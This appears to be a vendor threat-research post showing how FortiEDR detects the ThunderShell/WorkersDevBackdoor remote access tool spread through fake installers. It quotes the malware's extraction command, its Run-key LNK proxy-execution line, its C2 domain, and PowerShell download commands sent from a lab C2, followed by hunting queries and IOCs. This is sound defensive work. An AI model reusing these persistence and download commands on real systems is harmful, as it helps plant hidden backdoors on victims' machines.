Introduction
ThunderShell is an open source[1] Remote Access Tool (RAT) that has been reportedly used as part of various campaigns since at least March 2022. Variants of ThunderShell are also tracked as Parcel RAT[2], SMOKEDHAM[3] and WorkersDevBackdoor[4]. This RAT can be used to collect sensitive information, gather screenshots, perform keylogging, and provide arbitrary command execution on infected systems. In the last quarter of 2023 researchers at eSentire reported on a WorkersDevBackdoor campaign targeting organizations in the business services industry[5]. This campaign employed malicious online advertisements, which misled users into downloading WorkersDevBackdoor/ThunderShell malware masquerading as legitimate software.
To demonstrate FortiEDR’s ability to detect and mitigate this threat we detonated the main executable associated with the campaign reported by eSentire to observe the initial infection. Given the C2 is no longer active, we then created a C2 server using files in the ThunderShell GitHub repository[6] in our research lab and created some sample payloads to test in the FortiEDR environment. This allows us to demonstrate how the various functions available through the tool are detected and blocked by FortiEDR.
Attack Diagram
Figure 1. ThunderShell attack flow diagram.
Analysis
As highlighted above, recent ThunderShell campaigns involve the use of fake versions of legitimate free software. One example of that is the ‘Advanced IP Scanner’ tool. The associated malvertising campaign encourages a victim to download and execute a fake executable. In the case of our testing, we used a file ‘Advanced IP Scanner.exe’ (SHA256 - 5ad607e76fe170503b522526ef6df6569e0b4c21b7a9ee4a0b92d306cd955ac4)
This executable would have been downloaded and executed directly by the victim. The executable is an installer executable that was created using NSIS (Nullsoft Scriptable Install System). NSIS uses an initialization script to drive the installation process and in this case, this script was used to orchestrate the installation of the backdoor. In our analysis environment, the installer process triggered FortiEDR rule ‘Malicious File Detected’ from the ‘Execution Prevention’ security policy. This rule was triggered as the installer has a known signature match for a malicious file in the FortiGuard Threat Intelligence database. Since this executable was marked as malicious further actions performed by the associated process are blocked. We can observe this in Figure 2 below.
Figure 2. Fake installer ‘Advanced IP Scanner.exe’ was detected as malicious, and execution was blocked by FortiEDR.
Following execution, the installer begins to install the malware within the victim endpoint. As part of this process several files are extracted to folder C:\ProgramData\Microsoft\NodejsToolsVsix\. The installer executable then extracts the contents of the ‘WindowsDev.7z’ archive to the same folder using a portable version of 7zip using the following command:
C:\ProgramData\Microsoft\NodejsToolsVsix\7z.exe x C:\ProgramData\Microsoft\NodejsToolsVsix\WindowsDev.7z -pY<redacted>na
-oC:\ProgramData\Microsoft\NodejsToolsVsix
This command can be observed in FortiEDR threat hunting telemetry as shown in Figure 3.
Figure 3. 7z.exe is used by malware setup to extract file to desired folder.
There were six files in the WindowsDev.7z archive which were extracted to installation folder ‘C:\ProgramData\Microsoft\NodejsToolsVsix’. These files are in Figure 4 and a description of their functionality is in Table 1.
Figure 4. Files extracted from WindowsDev.7z archive.
|
File |
Description |
|
CG6oDkyFHl3R.t |
File containing obfuscated PowerShell payload used by LogConverter.bat |
|
LogConverter.bat |
File which is run by the persistence registry entry |
|
Microsoft.NodejsTools.PressAnyKey.exe |
Microsoft utility used for decoy proxy execution |
|
Microsoft.NodejsTools.PressAnyKey |
Shortcut file used for decoy proxy execution of LogConverter.bat |
|
NodejsToolsVsix.bat |
Single time execution by the malicious installer file using decoy proxy execution technique. |
|
q8DTE1uLaXRG.t |
File containing obfuscated PowerShell payload used by NodejsToolsVsix.bat |
Table 1. Files dropped as part of malware installation process
The installer process then created the folder ‘C:\ProgramData\Microsoft\LogConverter’ and copied these extracted files to this new folder. The installer process then created persistence for the malware by creating a registry key with name ‘PressAnyKey’ in the path ‘HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ with data as ‘C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk’
This LNK file contains following command as target of the LNK file:
C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe abnormal c:\programdata\%username%0 cmd /c C:\ProgramData\Microsoft\LogConverter\LogConverter.bat
This command will use the ‘Microsoft.NodejsTools.PressAnykey.exe’ executable to execute cmd.exe to run the commands in the ‘LogConverter.bat’ batch script. ‘Microsoft.NodejsTools.PressAnykey.exe’ executable is part of Microsoft Visual Studio Node.js tools package. The attacker is using this legitimate file to do proxy execution of the script ‘LogConverter.bat’. Any process started using the ‘Microsoft.NodejsTools.PressAnykey.exe’ would become subprocess of ‘Microsoft.NodejsTools.PressAnykey.exe’ so it would be less suspicious.
The LogConverter.bat file runs obfuscated PowerShell code contained in the file ‘CG6oDkyFHl3R.t’. We can observe the code within the BAT file in the following Figure 5.
Figure 5. Content of the malicious LogConverter.bat file.
This code tries to communicate to the C2 domain ‘cdn-us-tech.wtf-system-4759011.workers.dev’ which resolves to two IP addresses: ‘172.67.164.247’ and ‘104.21.49.163’.
The malware initial setup file is tagged as malicious, and the ‘powershell.exe’ run by the malware triggers FortiEDR rule ‘Suspicious Application’ from the security policy ‘Exfiltration Prevention’. FortiEDR blocked this C2 network communication happening through PowerShell. This can be observed in Figure 6 below.
Figure 6. Malicious C2 communication blocked by the FortiEDR.
The C2 associated with the above loader is no longer active so the behavior of the RAT when used to execute commands from the C2 cannot be observed. So, to demonstrate FortiEDR’s ability to detect and mitigate the operation of ThunderShell, a custom ThunderShell executable ‘IrDGPtJBqDLw.exe’ (SHA1 – 4193cc5702dd7e8b2d8caf7bb2c92727b850809e) was created. When this sample executable was detonated in the virtual machine with FortiEDR environment, it ran with no visible window and communicated back to its C2. The C2 in our scenario was hosted on another virtual machine in our research lab. This execution triggers ‘Unconfirmed Executable’ rule from the ‘Exfiltration Prevention’ security policy of FortiEDR. This rule was triggered as the executable did not have a known signature but Fortinet Cloud Services (FCS) integrations with online sandbox and ML (Machine Learning) engines identified the file as suspicious. The RAT’s network communication to its C2 was blocked by FortiEDR. Which can be seen in Figure 7. Note. Based on previous analysis the source process for this behavior would be PowerShell, you will see in our emulation the source process will be Explorer.exe as the malware was executed directly.
Figure 7. FortiEDR blocks C2 communication of the malicious ThunderShell executable.
When the malicious file communicates back to C2, the C2 server shows a session created with victim. This can be observed in Figure 8 below.
Figure 8. Attacker C2 Panel showing session connected with Victim.
After the initial connection to C2 was made, the RAT was used to take a screenshot of the victim endpoint and send it to the C2 server. It was preprogrammed to do this on first execution without any interaction by the attacker. This behavior results in the capture of a ‘Screen Capture’ event within FortiEDR Threat Hunting telemetry as shown in Figure 9 below.
Figure 9. Threat Hunting telemetry showing screenshot taken by malicious executable.
At the C2 server UI we can see the screenshot tab contains the screenshot taken by the RAT and observe the data available to a potential attacker. This UI and the screenshot can be observed in Figure 10 below.
Figure 10. C2 Panel showing the victim screenshot taken as part of ThunderShell activity.
The attacker can also use the RAT to get an interactive shell to the victim from the C2 server. To demonstrate this capability, we executed a simple PowerShell command to download an executable file from the internet to the victim machine. The command executed through interactive shell was:
powershell.exe Invoke-WebRequest https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe -OutFile c:\temp\pscp.exe
This command execution from C2 panel can be observed in Figure 11 below.
Figure 11. ThunderShell C2 panel showing command being sent to the victim.
The RAT executed PowerShell with given command which triggered the ‘Suspicious Application’ and ‘Unconfirmed Executable’ rules from the ‘Exfiltration Prevention’ security policy of FortiEDR. These rules were triggered because PowerShell establishing a network connection is considered suspicious by default. The security event associated with this behavior can be observed in Figure 12 below.
Figure 12. FortiEDR blocked download of external executable through PowerShell command.
The ThunderShell GitHub documentation mentioned that it has the ability to run PowerShell commands without invoking PowerShell.exe. The documentation mentions that directly giving PowerShell command without giving PowerShell.exe in the command prompt would execute the command using unmanaged PowerShell. In this case this is managed by malware code by using the Windows ‘System.Management.Automation.ni.dll’ file. This DLL is loaded by the malware sample when it starts the execution. We can observe the loading of this DLL in the FortiEDR Threat Hunting telemetry as shown in Figure 13.
Figure 13. Malware process loading System.Management.Automation.ni.dll
To check the unmanaged PowerShell functionality, we gave similar command from C2 to download file from internet but without using “PowerShell.exe” like:
Invoke-WebRequest https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe -OutFile c:\temp\pscp2.exe
When this command was executed the target file was downloaded but there was no “PowerShell.exe” process present in the subprocess chain of this command execution. The malware executable directly communicated to the IP address of the above given domain to download file. Since the executable is detected as Malicious this action was blocked by the FortiEDR which can be observed in Figure 14.
Figure 14. Malware unmanaged PowerShell Web request was blocked by FortiEDR
Conclusion
As highlighted in this article, FortiEDR can effectively detect and mitigate the installation of recent WorkersDevBackdoor/ThunderShell campaigns that involved the use of malvertising and fake installers. We can observe from our analysis that the malicious installer was detected as malicious, and execution of the malware and its subsequent behavior was blocked by default. During analysis FortiEDR was configured in ‘Log Only’ mode to allow post-execution behavior to be observed. From information detected by FortiEDR we can see that the fake installer extracted further malicious files and created persistence, then attempted to communicate with C2 which was detected and mitigated by FortiEDR.
Since the C2 was down, we created a copy of the ThunderShell tool in our analysis environment to demonstrate how FortiEDR would detect activity associated with a threat actor using the RAT functionality. FortiEDR behavior-based detections detected and mitigated the execution of the new, previously unknown ThunderShell payload, C2 communications from the RAT, external payload download attempt using PowerShell and attempted screenshotting through the RAT.
FortiEDR Threat Hunting queries for detecting ThunderShell behaviors, MITRE ATT&CK mappings for ThunderShell capabilities and the recent campaigns and IOCs from recent campaigns are included in this article to support proactive threat hunting activities.
Threat Hunting
The following threat hunting query will detect ‘Value Created’ events where registry key for file ‘C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk’ is created in specific registry path ‘HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ to achieve persistence. Note that the file name is specific to this campaign and the query might need adjustments for future campaigns.
Type: ("Value Created") AND Registry.Path: ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") AND Registry.Data: ("C\:\\ProgramData\\Microsoft\\LogConverter\\Microsoft.NodejsTools.PressAnyKey.lnk")
The following threat hunting query will detect ‘DNS Query’ events where the DNS query’s records reference the C2 domain associated with this campaign. Note that the C2 domain might change in future campaigns and a query might be needed to adjust accordingly. Note that this campaign is no longer operating and this query itself should be used for identifying historic intrusions, however the query can be replaced with new campaigns as new threat intelligence becomes available.
Type: ("DNS Query") AND Target.Network.DNS: ("cdn\-us\-tech.wtf\-system\-4759011.workers.dev")
The following threat hunting query will detect ‘Process Creation’ events where the target process file name is ‘7z.exe’ and command-line is for extraction of file 'C:\ProgramData\Microsoft\NodejsToolsVsix\WindowsDev.7z'. Note that the file name is specific to this campaign and the query might need adjustments for future campaigns.
Type: ("Process Creation") AND Target.Process.File.Name: ("7z.exe") AND Target.Process.CommandLine: ("x C\:\\ProgramData\\Microsoft\\NodejsToolsVsix\\WindowsDev.7z*")
The following threat hunting query will detect ‘Process Creation’ events where the executable ‘Advanced_IP_Scanner_2.5.4594.1.exe’ is run from specific folder ‘C:\ProgramData\Microsoft\NodejsToolsVsix\’. Normally this type of setup file would not exist in this specific folder. Note that the file name is specific to this campaign and the query might need adjustments for future campaigns.
Type: ("Process Creation") AND Target.Process.File.Name: ("Advanced_IP_Scanner_2.5.4594.1.exe") AND Target.Process.File.Path: ("ProgramData\\Microsoft\\NodejsToolsVsix\\Advanced_IP_Scanner_2.5.4594.1.exe")
The following threat hunting query will detect ‘Process Creation’ events where ‘Microsoft.NodejsTools.PressAnyKey.exe’ executable is used to run BAT file ‘C:\ProgramData\Microsoft\NodejsToolsVsix\NodejsToolsVsix.bat’ through ‘cmd.exe’. Note that the file name is specific to this campaign and the query might need adjustments for future campaigns.
Type: ("Process Creation") AND Source.Process.Name: ("Microsoft.NodejsTools.PressAnyKey.exe") AND Target.Process.File.Name: ("cmd.exe") AND Target.Process.CommandLine: ("\/c \"\"C\:\\ProgramData\\Microsoft\\NodejsToolsVsix\\NodejsToolsVsix.bat\"\"")
MITRE ATT&CK
Note: The indicators in observed activity for each MITRE technique are relevant to analyzed campaigns and may change in future campaigns.
TA0002 - Execution
|
Technique ID |
Technique Description |
Observed Activity |
|
T1059.001 |
Command and Scripting Interpreter: PowerShell |
The main ThunderShell process uses unmanaged PowerShell to run PowerShell commands received from the C2 server. PowerShell dll System.Management.ni.dll is loaded by the main Thundershell process on load. |
|
T1059.003 |
Command and Scripting Interpreter: Windows Command Shell |
The WorkersDevBackdoor campaign outlined in this article uses .BAT file for initial execution and installation as well as part of persistence mechanism that is implemented through a registry run key. |
TA0003 - Persistence
|
Technique ID |
Technique Description |
Observed Activity |
|
T1547.001 |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Malware creates key with name ‘PressAnyKey’ in the registry path ‘HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ for persistence. Run key triggers a .LNK file on execution which launches ‘Microsoft.NodejsTools.PressAnyKey.exe’ for proxy execution of malicious batch file. |
|
T1546.016 |
Event Triggered Execution: Installer Packages |
The WorkersDevBackdoor campaign outlined in this article uses customized installer package built in NSIS for initial execution and to establish persistence of the malware. |
TA0005 - Defense Evasion
|
Technique ID |
Technique Description |
Observed Activity |
|
T1564.003 |
Hide Artifacts: Hidden Window |
Initial installer payload runs a batch script with a hidden window during initial infection. |
|
T1027 |
Obfuscated Files or Information |
Some of the malicious files used by the installer employed in the WorkersDevBackdoor campaign described in this article are obfuscated in a password protected 7zip file. These files are later extracted before execution. |
|
T1480 |
Execution Guardrails |
The initial installation script from the WorkersDevBackdoor campaign described in this article checks if the victim endpoint is domain joined. If victim endpoint is not part of a domain, execution is halted. |
|
T1218 |
System Binary Proxy Execution |
The malicious batch file is executed using Visual Studio NodejsTools utility ‘Microsoft.NodejsTools.PressAnyKey.exe’ |
|
T1127 |
Trusted Developer Utilities Proxy Execution |
The malicious batch file called through run key registry persistence is executed via proxy execution through Visual Studio NodejsTools utility ‘Microsoft.NodejsTools.PressAnyKey.exe’ |
|
T1036.004 |
Masquerading: Masquerade Task or Service |
Malware installs initial files in a folder ‘ProgramData\Microsoft\NodejsToolsVsix’ likely to appear benign. |
TA0009 - Collection
|
Technique ID |
Technique Description |
Observed Activity |
|
T1113 |
Screen Capture |
After initial execution ThunderShell RAT can be configured to capture a screenshot of the victim endpoint. |
TA0011 - Command and Control
|
Technique ID |
Technique Description |
Observed Activity |
|
T1573 |
Encrypted Channel |
C2 communication encrypted with symmetric encryption for which encryption key is created at installation of C2 Server. |
|
T1071.001 |
Application Layer Protocol: Web Protocols |
C2 communication is implemented through web requests. |
TA0042 - Resource Development
|
Technique ID |
Technique Description |
Observed Activity |
|
T1583.008 |
Acquire Infrastructure: Malvertising |
Attackers employed malvertising on Google and Bing for spreading of malicious executable. |
IOC
|
Indicator Description |
Indicator |
Indicator Type |
Associated Tactic |
Notes |
First Observed |
|
Malicious Executable |
4193cc5702dd7e8b2d8caf7bb2c92727b850809e |
SHA1 Hash |
Installation |
ThunderShell malicious payload exe |
2024-03-14 |
|
Malicious Executable |
2fd58eb634dbbc46d2ecde8b454db46180754e97a8de6c54c05b4ec815d3df95 |
SHA256 Hash |
Installation |
ThunderShell malicious payload exe |
2024-03-14 |
|
Malicious Executable |
|
SHA1 Hash |
Installation |
Malicious Installer file |
2023-11-24 |
|
Malicious Executable |
5ad607e76fe170503b522526ef6df6569e0b4c21b7a9ee4a0b92d306cd955ac4 |
SHA256 Hash |
Installation |
Malicious Installer file |
2023-11-24 |
|
Malicious Executable |
80a31d1e3aa4ad6af5822db51ec81a4c369d6d44 |
SHA1 Hash |
Installation |
Malicious LogConverter.bat file |
2023-11-21 |
|
Malicious Executable |
6904134d19c0ec227bf0a3d94a7f4c135bc00a3938243c2ae457669937e86ce8 |
SHA256 Hash |
Installation |
Malicious LogConverter.bat file |
2023-11-21 |
|
Malicious Executable |
aad661e73a45dd53b321c61e611f4087367fabe2 |
SHA1 Hash |
Installation |
Malicious NodejsToolsVsix.bat file |
2023-11-21 |
|
Malicious Executable |
3cdd421716ae64b4bad46611eb3df599c5a52a76a85f83b60843b3f0f5d3ac3b |
SHA256 Hash |
Installation |
Malicious NodejsToolsVsix.bat file |
2023-11-21 |
|
Malicious Executable |
21e662472c7a99b6b42a29a3ed99964da8815f87 |
SHA1 Hash |
Installation |
Obfuscated payload CG6oDkyFHl3R.t |
2023-11-21 |
|
Malicious Executable |
7b5ccf47f25f0d128afae580d82b16473ea48f7a755ac77a472ab355596b8310 |
SHA256 Hash |
Installation |
Obfuscated payload CG6oDkyFHl3R.t |
2023-11-21 |
|
Malicious Executable |
6bb1a08ebb97f4c676b37dcaa33d751c46674cd7 |
SHA1 Hash |
Installation |
Obfuscated payload q8DTE1uLaXRG.t |
2023-11-21 |
|
Malicious Executable |
19b94b5efa1f75627827dced924849c15f4b4c1dfd72cf1c72990a611ee54338 |
SHA256 Hash |
Installation |
Obfuscated payload q8DTE1uLaXRG.t |
2023-11-21 |
[1] https://github.com/Mr-Un1k0d3r/ThunderShell/tree/master
[2] https://www.connectwise.com/resources/parcel-rat
[3] https://www.mandiant.com/resources/blog/shining-a-light-on-darkside-ransomware-operations
[4] https://www.esentire.com/blog/workersdevbackdoor-delivered-via-malvertising
[5] https://www.esentire.com/blog/workersdevbackdoor-delivered-via-malvertising
